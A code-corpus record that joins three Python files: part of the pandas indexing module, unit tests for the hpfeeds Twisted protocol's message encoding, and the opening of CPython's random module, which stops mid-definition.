indexing on an ndarray
Examples
ix[:5] -> slice(0, 5)
ix[[1,2,3]] -> [1,2,3]
ix[['foo', 'bar', 'baz']] -> [i, j, k] (indices of foo, bar, baz)
Going by Zen of Python?
"In the face of ambiguity, refuse the temptation to guess."
raise AmbiguousIndexError with integer labels?
- No, prefer label-based indexing
"""
labels = self.obj._get_axis(axis)
# if we are a scalar indexer and not type correct raise
obj = self._convert_scalar_indexer(obj, axis)
# see if we are positional in nature
is_int_index = labels.is_integer()
is_int_positional = is_integer(obj) and not is_int_index
# if we are a label return me
try:
return labels.get_loc(obj)
except LookupError:
if isinstance(obj, tuple) and isinstance(labels, MultiIndex):
if is_setter and len(obj) == labels.nlevels:
return {'key': obj}
raise
except TypeError:
pass
except (ValueError):
if not is_int_positional:
raise
# a positional
if is_int_positional:
# if we are setting and its not a valid location
# its an insert which fails by definition
if is_setter:
# always valid
if self.name == 'loc':
return {'key': obj}
# a positional
if (obj >= self.obj.shape[axis] and
not isinstance(labels, MultiIndex)):
raise ValueError("cannot set by positional indexing with "
"enlargement")
return obj
if isinstance(obj, slice):
return self._convert_slice_indexer(obj, axis)
elif is_nested_tuple(obj, labels):
return labels.get_locs(obj)
elif is_list_like_indexer(obj):
if is_bool_indexer(obj):
obj = check_bool_indexer(labels, obj)
inds, = obj.nonzero()
return inds
else:
if isinstance(obj, Index):
objarr = obj.values
else:
objarr = _asarray_tuplesafe(obj)
# The index may want to handle a list indexer differently
# by returning an indexer or raising
indexer = labels._convert_list_indexer(objarr, kind=self.name)
if indexer is not None:
return indexer
# this is not the most robust, but...
if (isinstance(labels, MultiIndex) and
not isinstance(objarr[0], tuple)):
level = 0
_, indexer = labels.reindex(objarr, level=level)
# take all
if indexer is None:
indexer = np.arange(len(labels))
check = labels.levels[0].get_indexer(objarr)
else:
level = None
# unique index
if labels.is_unique:
indexer = check = labels.get_indexer(objarr)
# non-unique (dups)
else:
(indexer,
missing) = labels.get_indexer_non_unique(objarr)
check = indexer
mask = check == -1
if mask.any():
raise KeyError('%s not in index' % objarr[mask])
return _values_from_object(indexer)
else:
try:
return labels.get_loc(obj)
except LookupError:
# allow a not found key only if we are a setter
if not is_list_like_indexer(obj) and is_setter:
return {'key': obj}
raise
def _tuplify(self, loc):
tup = [slice(None, None) for _ in range(self.ndim)]
tup[0] = loc
return tuple(tup)
def _get_slice_axis(self, slice_obj, axis=0):
obj = self.obj
if not need_slice(slice_obj):
return obj
indexer = self._convert_slice_indexer(slice_obj, axis)
if isinstance(indexer, slice):
return self._slice(indexer, axis=axis, kind='iloc')
else:
return self.obj.take(indexer, axis=axis, convert=False)
class _IXIndexer(_NDFrameIndexer):
"""A primarily label-location based indexer, with integer position
fallback.
``.ix[]`` supports mixed integer and label based access. It is
primarily label based, but will fall back to integer positional
access unless the corresponding axis is of integer type.
``.ix`` is the most general indexer and will support any of the
inputs in ``.loc`` and ``.iloc``. ``.ix`` also supports floating
point label schemes. ``.ix`` is exceptionally useful when dealing
with mixed positional and label based hierachical indexes.
However, when an axis is integer based, ONLY label based access
and not positional access is supported. Thus, in such cases, it's
usually better to be explicit and use ``.iloc`` or ``.loc``.
See more at :ref:`Advanced Indexing <advanced>`.
"""
def _has_valid_type(self, key, axis):
if isinstance(key, slice):
return True
elif is_bool_indexer(key):
return True
elif is_list_like_indexer(key):
return True
else:
self._convert_scalar_indexer(key, axis)
return True
class _LocationIndexer(_NDFrameIndexer):
_exception = Exception
def __getitem__(self, key):
if type(key) is tuple:
return self._getitem_tuple(key)
else:
return self._getitem_axis(key, axis=0)
def _getitem_axis(self, key, axis=0):
raise NotImplementedError()
def _getbool_axis(self, key, axis=0):
labels = self.obj._get_axis(axis)
key = check_bool_indexer(labels, key)
inds, = key.nonzero()
try:
return self.obj.take(inds, axis=axis, convert=False)
except Exception as detail:
raise self._exception(detail)
def _get_slice_axis(self, slice_obj, axis=0):
""" this is pretty simple as we just have to deal with labels """
obj = self.obj
if not need_slice(slice_obj):
return obj
labels = obj._get_axis(axis)
indexer = labels.slice_indexer(slice_obj.start, slice_obj.stop,
slice_obj.step)
if isinstance(indexer, slice):
return self._slice(indexer, axis=axis, kind='iloc')
else:
return self.obj.take(indexer, axis=axis, convert=False)
class _LocIndexer(_LocationIndexer):
"""Purely label-location based indexer for selection by label.
``.loc[]`` is primarily label based, but may also be used with a
boolean array.
Allowed inputs are:
- A single label, e.g. ``5`` or ``'a'``, (note that ``5`` is
interpreted as a *label* of the index, and **never** as an
integer position along the index).
- A list or array of labels, e.g. ``['a', 'b', 'c']``.
- A slice object with labels, e.g. ``'a':'f'`` (note that contrary
to usual python slices, **both** the start and the stop are included!).
- A boolean array.
``.loc`` will raise a ``KeyError`` when the items are not found.
See more at :ref:`Selection by Label <indexing.label>`
"""
_valid_types = ("labels (MUST BE IN THE INDEX), slices of labels (BOTH "
"endpoints included! Can be slices of integers if the "
"index is integers), listlike of labels, boolean")
_exception = KeyError
def _has_valid_type(self, key, axis):
ax = self.obj._get_axis(axis)
# valid for a label where all labels are in the index
# slice of lables (where start-end in labels)
# slice of integers (only if in the lables)
# boolean
if isinstance(key, slice):
return True
elif is_bool_indexer(key):
return True
elif is_list_like_indexer(key):
# mi is just a passthru
if isinstance(key, tuple) and isinstance(ax, MultiIndex):
return True
# TODO: don't check the entire key unless necessary
if len(key) and np.all(ax.get_indexer_for(key) < 0):
raise KeyError("None of [%s] are in the [%s]" %
(key, self.obj._get_axis_name(axis)))
return True
else:
def error():
if isnull(key):
raise TypeError(
"cannot use label indexing with a null key")
raise KeyError("the label [%s] is not in the [%s]" %
(key, self.obj._get_axis_name(axis)))
try:
key = self._convert_scalar_indexer(key, axis)
if not key in ax:
error()
except (TypeError) as e:
# python 3 type errors should be raised
if 'unorderable' in str(e): # pragma: no cover
error()
raise
except:
error()
return True
def _getitem_axis(self, key, axis=0):
labels = self.obj._get_axis(axis)
if isinstance(key, slice):
self._has_valid_type(key, axis)
return self._get_slice_axis(key, axis=axis)
elif is_bool_indexer(key):
return self._getbool_axis(key, axis=axis)
elif is_list_like_indexer(key):
# GH 7349
# possibly convert a list-like into a nested tuple
# but don't convert a list-like of tuples
if isinstance(labels, MultiIndex):
if not isinstance(key, tuple) and len(key) > 1 and not isinstance(key[0], tuple):
key = tuple([key])
# an iterable multi-selection
if not (isinstance(key, tuple) and
isinstance(labels, MultiIndex)):
if hasattr(key, 'ndim') and key.ndim > 1:
raise ValueError('Cannot index with multidimensional key')
return self._getitem_iterable(key, axis=axis)
# nested tuple slicing
if is_nested_tuple(key, labels):
locs = labels.get_locs(key)
indexer = [ slice(None) ] * self.ndim
indexer[axis] = locs
return self.obj.iloc[tuple(indexer)]
# fall thru to straight lookup
self._has_valid_type(key, axis)
return self._get_label(key, axis=axis)
class _iLocIndexer(_LocationIndexer):
"""Purely integer-location based indexing for selection by position.
``.iloc[]`` is primarily integer position based (from ``0`` to
``length-1`` of the axis), but may also be used with a boolean
array.
Allowed inputs are:
- An integer, e.g. ``5``.
- A list or array of integers, e.g. ``[4, 3, 0]``.
- A slice object with ints, e.g. ``1:7``.
- A boolean array.
``.iloc`` will raise ``IndexError`` if a requested indexer is
out-of-bounds, except *slice* indexers which allow out-of-bounds
indexing (this conforms with python/numpy *slice* semantics).
See more at :ref:`Selection by Position <indexing.integer>`
"""
_valid_types = ("integer, integer slice (START point is INCLUDED, END "
"point is EXCLUDED), listlike of integers, boolean array")
_exception = IndexError
def _has_valid_type(self, key, axis):
if is_bool_indexer(key):
if hasattr(key, 'index') and isinstance(key.index, Index):
if key.index.inferred_type == 'integer':
raise NotImplementedError(
"iLocation based boolean indexing on an integer type "
"is not available"
)
raise ValueError("iLocation based boolean indexing cannot use "
"an indexable as a mask")
return True
if isinstance(key, slice):
return True
elif is_integer(key):
return self._is_valid_integer(key, axis)
elif is_list_like_indexer(key):
return self._is_valid_list_like(key, axis)
return False
def _has_valid_setitem_indexer(self, indexer):
self._has_valid_positional_setitem_indexer(indexer)
def _is_valid_integer(self, key, axis):
# return a boolean if we have a valid integer indexer
ax = self.obj._get_axis(axis)
l = len(ax)
if key >= l or key < -l:
raise IndexError("single positional indexer is out-of-bounds")
return True
def _is_valid_list_like(self, key, axis):
# return a boolean if we are a valid list-like (e.g. that we dont' have out-of-bounds values)
# coerce the key to not exceed the maximum size of the index
arr = np.array(key)
ax = self.obj._get_axis(axis)
l = len(ax)
if len(arr) and (arr.max() >= l or arr.min() < -l):
raise IndexError("positional indexers are out-of-bounds")
return True
def _getitem_tuple(self, tup):
self._has_valid_tuple(tup)
try:
return self._getitem_lowerdim(tup)
except:
pass
retval = self.obj
axis=0
for i, key in enumerate(tup):
if i >= self.obj.ndim:
raise IndexingError('Too many indexers')
if is_null_slice(key):
axis += 1
continue
retval = getattr(retval, self.name)._getitem_axis(key, axis=axis)
# if the dim was reduced, then pass a lower-dim the next time
if retval.ndim<self.ndim:
axis -= 1
# try to get for the next axis
axis += 1
return retval
def _get_slice_axis(self, slice_obj, axis=0):
obj = self.obj
if not need_slice(slice_obj):
return obj
slice_obj = self._convert_slice_indexer(slice_obj, axis)
if isinstance(slice_obj, slice):
return self._slice(slice_obj, axis=axis, kind='iloc')
else:
return self.obj.take(slice_obj, axis=axis, convert=False)
def _getitem_axis(self, key, axis=0):
if isinstance(key, slice):
self._has_valid_type(key, axis)
return self._get_slice_axis(key, axis=axis)
elif is_bool_indexer(key):
self._has_valid_type(key, axis)
return self._getbool_axis(key, axis=axis)
# a single integer or a list of integers
else:
if is_list_like_indexer(key):
# validate list bounds
self._is_valid_list_like(key, axis)
# force an actual list
key = list(key)
else:
key = self._convert_scalar_indexer(key, axis)
if not is_integer(key):
raise TypeError("Cannot index by location index with a "
"non-integer key")
# validate the location
self._is_valid_integer(key, axis)
return self._get_loc(key, axis=axis)
def _convert_to_indexer(self, obj, axis=0, is_setter=False):
""" much simpler as we only have to deal with our valid types """
# make need to convert a float key
if isinstance(obj, slice):
return self._convert_slice_indexer(obj, axis)
elif is_float(obj):
return self._convert_scalar_indexer(obj, axis)
elif self._has_valid_type(obj, axis):
return obj
raise ValueError("Can only index by location with a [%s]" %
self._valid_types)
class _ScalarAccessIndexer(_NDFrameIndexer):
""" access scalars quickly """
def _convert_key(self, key, is_setter=False):
return list(key)
def __getitem__(self, key):
if not isinstance(key, tuple):
# we could have a convertible item here (e.g. Timestamp)
if not is_list_like_indexer(key):
key = tuple([key])
else:
raise ValueError('Invalid call for scalar access (getting)!')
key = self._convert_key(key)
return self.obj.get_value(*key, takeable=self._takeable)
def __setitem__(self, key, value):
if not isinstance(key, tuple):
key = self._tuplify(key)
if len(key) != self.obj.ndim:
raise ValueError('Not enough indexers for scalar access '
'(setting)!')
key = list(self._convert_key(key, is_setter=True))
key.append(value)
self.obj.set_value(*key, takeable=self._takeable)
class _AtIndexer(_ScalarAccessIndexer):
"""Fast label-based scalar accessor
Similarly to ``loc``, ``at`` provides **label** based scalar lookups.
You can also set using these indexers.
"""
_takeable = False
def _convert_key(self, key, is_setter=False):
""" require they keys to be the same type as the index (so we don't fallback) """
# allow arbitrary setting
if is_setter:
return list(key)
for ax, i in zip(self.obj.axes, key):
if ax.is_integer():
if not is_integer(i):
raise ValueError("At based indexing on an integer index can only have integer "
"indexers")
else:
if is_integer(i):
raise ValueError("At based indexing on an non-integer index can only have non-integer "
"indexers")
return key
class _iAtIndexer(_ScalarAccessIndexer):
"""Fast integer location scalar accessor.
Similarly to ``iloc``, ``iat`` provides **integer** based lookups.
You can also set using these indexers.
"""
_takeable = True
def _has_valid_setitem_indexer(self, indexer):
self._has_valid_positional_setitem_indexer(indexer)
def _convert_key(self, key, is_setter=False):
""" require integer args (and convert to label arguments) """
for a, i in zip(self.obj.axes, key):
if not is_integer(i):
raise ValueError("iAt based indexing can only have integer "
"indexers")
return key
# 32-bit floating point machine epsilon
_eps = np.finfo('f4').eps
def length_of_indexer(indexer, target=None):
"""return the length of a single non-tuple indexer which could be a slice
"""
if target is not None and isinstance(indexer, slice):
l = len(target)
start = indexer.start
stop = indexer.stop
step = indexer.step
if start is None:
start = 0
elif start < 0:
start += l
if stop is None or stop > l:
stop = l
elif stop < 0:
stop += l
if step is None:
step = 1
elif step < 0:
step = -step
return (stop - start + step-1) // step
elif isinstance(indexer, (ABCSeries, Index, np.ndarray, list)):
return len(indexer)
elif not is_list_like_indexer(indexer):
return 1
raise AssertionError("cannot find the length of the indexer")
def convert_to_index_sliceable(obj, key):
"""if we are index sliceable, then return my slicer, otherwise return None
"""
idx = obj.index
if isinstance(key, slice):
return idx._convert_slice_indexer(key, kind='getitem')
elif isinstance(key, compat.string_types):
# we are an actual column
if key in obj._data.items:
return None
# we need a timelike key here
if idx.is_all_dates:
try:
return idx._get_string_slice(key)
except:
return None
return None
def is_index_slice(obj):
def _is_valid_index(x):
return (is_integer(x) or is_float(x)
and np.allclose(x, int(x), rtol=_eps, atol=0))
def _crit(v):
return v is None or _is_valid_index(v)
both_none = obj.start is None and obj.stop is None
return not both_none and (_crit(obj.start) and _crit(obj.stop))
def check_bool_indexer(ax, key):
# boolean indexing, need to check that the data are aligned, otherwise
# disallowed
# this function assumes that is_bool_indexer(key) == True
result = key
if isinstance(key, ABCSeries) and not key.index.equals(ax):
result = result.reindex(ax)
mask = com.isnull(result._values)
if mask.any():
raise IndexingError('Unalignable boolean Series key provided')
result = result.astype(bool)._values
else:
# is_bool_indexer has already checked for nulls in the case of an
# object array key, so no check needed here
result = np.asarray(result, dtype=bool)
return result
def convert_missing_indexer(indexer):
""" reverse convert a missing indexer, which is a dict
return the scalar indexer and a boolean indicating if we converted """
if isinstance(indexer, dict):
# a missing key (but not a tuple indexer)
indexer = indexer['key']
if isinstance(indexer, bool):
raise KeyError("cannot use a single bool to index into setitem")
return indexer, True
return indexer, False
def convert_from_missing_indexer_tuple(indexer, axes):
""" create a filtered indexer that doesn't have any missing indexers """
def get_indexer(_i, _idx):
return (axes[_i].get_loc(_idx['key'])
if isinstance(_idx, dict) else _idx)
return tuple([get_indexer(_i, _idx) for _i, _idx in enumerate(indexer)])
def maybe_convert_indices(indices, n):
""" if we have negative indicies, translate to postive here
if have indicies that are out-of-bounds, raise an IndexError
"""
if isinstance(indices, list):
indices = np.array(indices)
if len(indices) == 0:
# If list is empty, np.array will return float and cause indexing
# errors.
return np.empty(0, dtype=np.int_)
mask = indices < 0
if mask.any():
indices[mask] += n
mask = (indices >= n) | (indices < 0)
if mask.any():
raise IndexError("indices are out-of-bounds")
return indices
def maybe_convert_ix(*args):
"""
We likely want to take the cross-product
"""
ixify = True
for arg in args:
if not isinstance(arg, (np.ndarray, list, ABCSeries, Index)):
ixify = False
if ixify:
return np.ix_(*args)
else:
return args
def is_nested_tuple(tup, labels):
# check for a compatiable nested tuple and multiindexes among the axes
if not isinstance(tup, tuple):
return False
# are we nested tuple of: tuple,list,slice
for i, k in enumerate(tup):
if isinstance(k, (tuple, list, slice)):
return isinstance(labels, MultiIndex)
return False
def is_list_like_indexer(key):
# allow a list_like, but exclude NamedTuples which can be indexers
return is_list_like(key) and not (isinstance(key, tuple) and type(key) is not tuple)
def is_label_like(key):
# select a label or row
return not isinstance(key, slice) and not is_list_like_indexer(key)
def need_slice(obj):
return (obj.start is not None or
obj.stop is not None or
(obj.step is not None and obj.step != 1))
def maybe_droplevels(index, key):
# drop levels
original_index = index
if isinstance(key, tuple):
for _ in key:
try:
index = index.droplevel(0)
except:
# we have dropped too much, so back out
return original_index
else:
try:
index = index.droplevel(0)
except:
pass
return index
def _non_reducing_slice(slice_):
"""
Ensurse that a slice doesn't reduce to a Series or Scalar.
Any user-paseed `subset` should have this called on it
to make sure we're always working with DataFrames.
"""
# default to column slice, like DataFrame
# ['A', 'B'] -> IndexSlices[:, ['A', 'B']]
kinds = tuple(list(compat.string_types) +
[ABCSeries, np.ndarray, Index, list])
if isinstance(slice_, kinds):
slice_ = IndexSlice[:, slice_]
def pred(part):
# true when slice does *not* reduce
return isinstance(part, slice) or com.is_list_like(part)
if not com.is_list_like(slice_):
if not isinstance(slice_, slice):
# a 1-d slice, like df.loc[1]
slice_ = [[slice_]]
else:
# slice(a, b, c)
slice_ = [slice_] # to tuplize later
else:
slice_ = [part if pred(part) else [part] for part in slice_]
return tuple(slice_)
def _maybe_numeric_slice(df, slice_, include_bool=False):
"""
want nice defaults for background_gradient that don't break
with non-numeric data. But if slice_ is passed go with that.
"""
if slice_ is None:
dtypes = [np.number]
if include_bool:
dtypes.append(bool)
slice_ = IndexSlice[:, df.select_dtypes(include=dtypes).columns]
return slice_
| Vvucinic/Wander | venv_2_7/lib/python2.7/site-packages/pandas/core/indexing.py | Python | artistic-2.0 | 64,500 |
import unittest
from hpfeeds.twisted import BaseProtocol, ClientProtocol
from .utils import mock
class TestTwistedBaseProtocol(unittest.TestCase):
def setUp(self):
self.protocol = BaseProtocol()
self.transport = self.patch_object(self.protocol, 'transport')
def patch_object(self, *args, **kwargs):
patcher = mock.patch.object(*args, **kwargs)
self.addCleanup(patcher.stop)
return patcher.start()
def test_onError(self):
self.assertRaises(NotImplementedError, self.protocol.onError, 'error')
def test_onInfo(self):
self.assertRaises(NotImplementedError, self.protocol.onInfo, 'name', b'rand')
def test_onAuth(self):
self.assertRaises(NotImplementedError, self.protocol.onAuth, 'name', b'rand')
def test_onPublish(self):
self.assertRaises(NotImplementedError, self.protocol.onPublish, 'ident', 'chan', 'data')
def test_onSubscribe(self):
self.assertRaises(NotImplementedError, self.protocol.onSubscribe, 'ident', 'chan')
def test_onUnsubscribe(self):
self.assertRaises(NotImplementedError, self.protocol.onUnsubscribe, 'ident', 'chan')
def test_error(self):
self.protocol.error('error')
assert self.transport.write.call_args[0][0] == b'\x00\x00\x00\n\x00error'
def test_info(self):
self.protocol.info('name', b'\x00' * 4)
assert self.transport.write.call_args[0][0] == b'\x00\x00\x00\x0e\x01\x04name\x00\x00\x00\x00'
def test_auth(self):
self.protocol.auth(b'\x00' * 4, 'ident', 'secret')
assert self.transport.write.call_args[0][0] == \
b'\x00\x00\x00\x1f\x02\x05ident\x16\xa3\x11\xd5\xc2`\xcd\xc1\xee\xf3\x8b\xaf"\xdf\x97\x18\x90t&\xac'
def test_publish(self):
self.protocol.publish('ident', 'chan', 'payload')
assert self.transport.write.call_args[0][0] == b'\x00\x00\x00\x17\x03\x05ident\x04chanpayload'
def test_subscribe(self):
self.protocol.subscribe('ident', 'chan')
assert self.transport.write.call_args[0][0] == b'\x00\x00\x00\x0f\x04\x05identchan'
def test_unsubscribe(self):
self.protocol.unsubscribe('ident', 'chan')
assert self.transport.write.call_args[0][0] == b'\x00\x00\x00\x0f\x05\x05identchan'
def test_protocolError(self):
self.protocol.protocolError('reason')
class TestTwistedBaseProtocolDecoding(unittest.TestCase):
def setUp(self):
self.protocol = BaseProtocol()
self.onError = self.patch_object(self.protocol, 'onError')
self.onInfo = self.patch_object(self.protocol, 'onInfo')
self.onAuth = self.patch_object(self.protocol, 'onAuth')
self.onPublish = self.patch_object(self.protocol, 'onPublish')
self.onSubscribe = self.patch_object(self.protocol, 'onSubscribe')
self.onUnsubscribe = self.patch_object(self.protocol, 'onUnsubscribe')
self.protocolError = self.patch_object(self.protocol, 'protocolError')
self.transport = self.patch_object(self.protocol, 'transport')
def patch_object(self, *args, **kwargs):
patcher = mock.patch.object(*args, **kwargs)
self.addCleanup(patcher.stop)
return patcher.start()
def test_onError(self):
self.protocol.dataReceived(b'\x00\x00\x00\n\x00error')
assert self.onError.call_args[0][0] == 'error'
def test_onInfo(self):
self.protocol.dataReceived(b'\x00\x00\x00\x0e\x01\x04name\x00\x00\x00\x00')
assert self.onInfo.call_args[0][0] == 'name'
assert self.onInfo.call_args[0][1] == b'\x00' * 4
def test_onAuth(self):
self.protocol.dataReceived(b'\x00\x00\x00\x1f\x02\x05ident\x16\xa3\x11\xd5\xc2`\xcd\xc1\xee\xf3\x8b\xaf"\xdf\x97\x18\x90t&\xac')
assert self.onAuth.call_args[0][0] == 'ident'
assert self.onAuth.call_args[0][1] == b'\x16\xa3\x11\xd5\xc2`\xcd\xc1\xee\xf3\x8b\xaf"\xdf\x97\x18\x90t&\xac'
def test_onPublish(self):
self.protocol.dataReceived(b'\x00\x00\x00\x17\x03\x05ident\x04chanpayload')
assert self.onPublish.call_args[0][0] == 'ident'
assert self.onPublish.call_args[0][1] == 'chan'
assert self.onPublish.call_args[0][2] == b'payload'
def test_onSubscribe(self):
self.protocol.dataReceived(b'\x00\x00\x00\x0f\x04\x05identchan')
assert self.onSubscribe.call_args[0][0] == 'ident'
assert self.onSubscribe.call_args[0][1] == 'chan'
def test_onUnsubscribe(self):
self.protocol.dataReceived(b'\x00\x00\x00\x0f\x05\x05identchan')
assert self.onUnsubscribe.call_args[0][0] == 'ident'
assert self.onUnsubscribe.call_args[0][1] == 'chan'
def test_invalid_opcode(self):
# We test this seperately as the unpacker also enforces valid opcodes
# So normally this won't be hit.
self.protocol.messageReceived(77, b'\x05identchan')
assert self.protocolError.call_args[0][0] == 'Unknown message opcode: 77'
self.transport.loseConnection.assert_called_with()
def test_invalid_opcode_2(self):
self.protocol.dataReceived(b'\x00\x00\x00\x0f\x06\x05identchan')
assert self.protocolError.call_args[0][0] == 'Unknown opcode: 6'
self.transport.loseConnection.assert_called_with()
def test_invalid_size(self):
self.protocol.dataReceived(b'\x00\xff\xff\xff\x05\x05identchan')
assert self.protocolError.call_args[0][0] == 'Message too big; op 5 ml: 16777215 max_ml: 1048576'
self.transport.loseConnection.assert_called_with()
class TestTwistedClientProtocol(unittest.TestCase):
def setUp(self):
self.protocol = ClientProtocol()
self.protocol.factory = mock.Mock()
self.protocol.factory.ident = 'ident'
self.protocol.factory.secret = 'secret'
self.transport = self.patch_object(self.protocol, 'transport')
self.connectionReady = self.patch_object(self.protocol, 'connectionReady')
self.protocolError = self.patch_object(self.protocol, 'protocolError')
def patch_object(self, *args, **kwargs):
patcher = mock.patch.object(*args, **kwargs)
self.addCleanup(patcher.stop)
return patcher.start()
def test_connectionReady(self):
self.protocol.connectionReady()
def test_onInfo(self):
# A client should auto-reply to an OP_INFO the call connectionReady
self.protocol.onInfo('hpfeeds', b'\x00' * 4)
assert self.transport.write.call_args[0][0] == \
b'\x00\x00\x00\x1f\x02\x05ident\x16\xa3\x11\xd5\xc2`\xcd\xc1\xee\xf3\x8b\xaf"\xdf\x97\x18\x90t&\xac'
def test_onAuth(self):
''' Client should never receive an OP_AUTH message - it is an error if it does '''
self.protocol.dataReceived(b'\x00\x00\x00\x1f\x02\x05ident\x16\xa3\x11\xd5\xc2`\xcd\xc1\xee\xf3\x8b\xaf"\xdf\x97\x18\x90t&\xac')
assert self.protocolError.call_args[0][0] == 'Unexpected OP_AUTH'
self.transport.loseConnection.assert_called_with()
def test_onSubscribe(self):
''' Client should never receive an OP_SUBSCRIBE message - it is an error if it does '''
self.protocol.dataReceived(b'\x00\x00\x00\x0f\x04\x05identchan')
assert self.protocolError.call_args[0][0] == 'Unexpected OP_SUBSCRIBE'
self.transport.loseConnection.assert_called_with()
def test_onUnsubscribe(self):
''' Client should never receive an OP_UNSUBSCRIBE message - it is an error if it does '''
self.protocol.dataReceived(b'\x00\x00\x00\x0f\x05\x05identchan')
assert self.protocolError.call_args[0][0] == 'Unexpected OP_UNSUBSCRIBE'
self.transport.loseConnection.assert_called_with()
def test_error(self):
self.assertRaises(RuntimeError, self.protocol.error, 'error')
def test_info(self):
self.assertRaises(RuntimeError, self.protocol.info, 'name', b'\x00' * 4)
class TestTwistedClientProtocolConnReady(unittest.TestCase):
def test_connectionReady(self):
self.protocol = ClientProtocol()
self.protocol.connectionReady()
| rep/hpfeeds | tests/test_twisted_protocol.py | Python | gpl-3.0 | 8,065 |
"""Random variable generators.
integers
--------
uniform within range
sequences
---------
pick random element
pick random sample
pick weighted random sample
generate random permutation
distributions on the real line:
------------------------------
uniform
triangular
normal (Gaussian)
lognormal
negative exponential
gamma
beta
pareto
Weibull
distributions on the circle (angles 0 to 2pi)
---------------------------------------------
circular uniform
von Mises
General notes on the underlying Mersenne Twister core generator:
* The period is 2**19937-1.
* It is one of the most extensively tested generators in existence.
* The random() method is implemented in C, executes in a single Python step,
and is, therefore, threadsafe.
"""
from warnings import warn as _warn
from types import MethodType as _MethodType, BuiltinMethodType as _BuiltinMethodType
from math import log as _log, exp as _exp, pi as _pi, e as _e, ceil as _ceil
from math import sqrt as _sqrt, acos as _acos, cos as _cos, sin as _sin
from os import urandom as _urandom
from _collections_abc import Set as _Set, Sequence as _Sequence
from hashlib import sha512 as _sha512
import itertools as _itertools
import bisect as _bisect
__all__ = ["Random","seed","random","uniform","randint","choice","sample",
"randrange","shuffle","normalvariate","lognormvariate",
"expovariate","vonmisesvariate","gammavariate","triangular",
"gauss","betavariate","paretovariate","weibullvariate",
"getstate","setstate", "getrandbits", "choices",
"SystemRandom"]
NV_MAGICCONST = 4 * _exp(-0.5)/_sqrt(2.0)
TWOPI = 2.0*_pi
LOG4 = _log(4.0)
SG_MAGICCONST = 1.0 + _log(4.5)
BPF = 53 # Number of bits in a float
RECIP_BPF = 2**-BPF
# Translated by Guido van Rossum from C source provided by
# Adrian Baddeley. Adapted by Raymond Hettinger for use with
# the Mersenne Twister and os.urandom() core generators.
import _random
class Random(_random.Random):
"""Random number generator base class used by bound module functions.
Used to instantiate instances of Random to get generators that don't
share state.
Class Random can also be subclassed if you want to use a different basic
generator of your own devising: in that case, override the following
methods: random(), seed(), getstate(), and setstate().
Optionally, implement a getrandbits() method so that randrange()
can cover arbitrarily large ranges.
"""
VERSION = 3 # used by getstate/setstate
def __init__(self, x=None):
"""Initialize an instance.
Optional argument x controls seeding, as for Random.seed().
"""
self.seed(x)
self.gauss_next = None
def seed(self, a=None, version=2):
"""Initialize internal state from hashable object.
None or no argument seeds from current time or from an operating
system specific randomness source if available.
If *a* is an int, all bits are used.
For version 2 (the default), all of the bits are used if *a* is a str,
bytes, or bytearray. For version 1 (provided for reproducing random
sequences from older versions of Python), the algorithm for str and
bytes generates a narrower range of seeds.
"""
if version == 1 and isinstance(a, (str, bytes)):
x = ord(a[0]) << 7 if a else 0
for c in a:
x = ((1000003 * x) ^ ord(c)) & 0xFFFFFFFFFFFFFFFF
x ^= len(a)
a = -2 if x == -1 else x
if version == 2 and isinstance(a, (str, bytes, bytearray)):
if isinstance(a, str):
a = a.encode()
a += _sha512(a).digest()
a = int.from_bytes(a, 'big')
super().seed(a)
self.gauss_next = None
def getstate(self):
"""Return internal state; can be passed to setstate() later."""
return self.VERSION, super().getstate(), self.gauss_next
def setstate(self, state):
"""Restore internal state from object returned by getstate()."""
version = state[0]
if version == 3:
version, internalstate, self.gauss_next = state
super().setstate(internalstate)
elif version == 2:
version, internalstate, self.gauss_next = state
# In version 2, the state was saved as signed ints, which causes
# inconsistencies between 32/64-bit systems. The state is
# really unsigned 32-bit ints, so we convert negative ints from
# version 2 to positive longs for version 3.
try:
internalstate = tuple(x % (2**32) for x in internalstate)
except ValueError as e:
raise TypeError from e
super().setstate(internalstate)
else:
raise ValueError("state with version %s passed to "
"Random.setstate() of version %s" %
(version, self.VERSION))
## ---- Methods below this point do not need to be overridden when
## ---- subclassing for the purpose of using a different core generator.
## -------------------- pickle support -------------------
# Issue 17489: Since __reduce__ was defined to fix #759889 this is no
# longer called; we leave it here because it has been here since random was
# rewritten back in 2001 and why risk breaking something.
def __getstate__(self): # for pickle
return self.getstate()
def __setstate__(self, state): # for pickle
self.setstate(state)
def __reduce__(self):
return self.__class__, (), self.getstate()
## -------------------- integer methods -------------------
def randrange(self, start, stop=None, step=1, _int=int):
"""Choose a random item from range(start, stop[, step]).
This fixes the problem with randint() which includes the
endpoint; in Python this is usually not what you want.
"""
# This code is a bit messy to make it fast for the
# common case while still doing adequate error checking.
istart = _int(start)
if istart != start:
raise ValueError("non-integer arg 1 for randrange()")
if stop is None:
if istart > 0:
return self._randbelow(istart)
raise ValueError("empty range for randrange()")
# stop argument supplied.
istop = _int(stop)
if istop != stop:
raise ValueError("non-integer stop for randrange()")
width = istop - istart
if step == 1 and width > 0:
return istart + self._randbelow(width)
if step == 1:
raise ValueError("empty range for randrange() (%d,%d, %d)" % (istart, istop, width))
# Non-unit step argument supplied.
istep = _int(step)
if istep != step:
raise ValueError("non-integer step for randrange()")
if istep > 0:
n = (width + istep - 1) // istep
elif istep < 0:
n = (width + istep + 1) // istep
else:
raise ValueError("zero step for randrange()")
if n <= 0:
raise ValueError("empty range for randrange()")
return istart + istep*self._randbelow(n)
def randint(self, a, b):
"""Return random integer in range [a, b], including both end points.
"""
return self.randrange(a, b+1)
def _randbelow(self, n, int=int, maxsize=1<<BPF, type=type,
Method=_MethodType, BuiltinMethod=_BuiltinMethodType):
"Return a random int in the range [0,n). Raises ValueError if n==0."
random = self.random
getrandbits = self.getrandbits
# Only call self.getrandbits if the original random() builtin method
# has not been overridden or if a new getrandbits() was supplied.
if type(random) is BuiltinMethod or type(getrandbits) is Method:
k = n.bit_length() # don't use (n-1) here because n can be 1
r = getrandbits(k) # 0 <= r < 2**k
while r >= n:
r = getrandbits(k)
return r
# There's an overridden random() method but no new getrandbits() method,
# so we can only use random() from here.
if n >= maxsize:
_warn("Underlying random() generator does not supply \n"
"enough bits to choose from a population range this large.\n"
"To remove the range limitation, add a getrandbits() method.")
return int(random() * n)
rem = maxsize % n
limit = (maxsize - rem) / maxsize # int(limit * maxsize) % n == 0
r = random()
while r >= limit:
r = random()
return int(r*maxsize) % n
## -------------------- sequence methods -------------------
def choice(self, seq):
"""Choose a random element from a non-empty sequence."""
try:
i = self._randbelow(len(seq))
except ValueError:
raise IndexError('Cannot choose from an empty sequence')
return seq[i]
def shuffle(self, x, random=None):
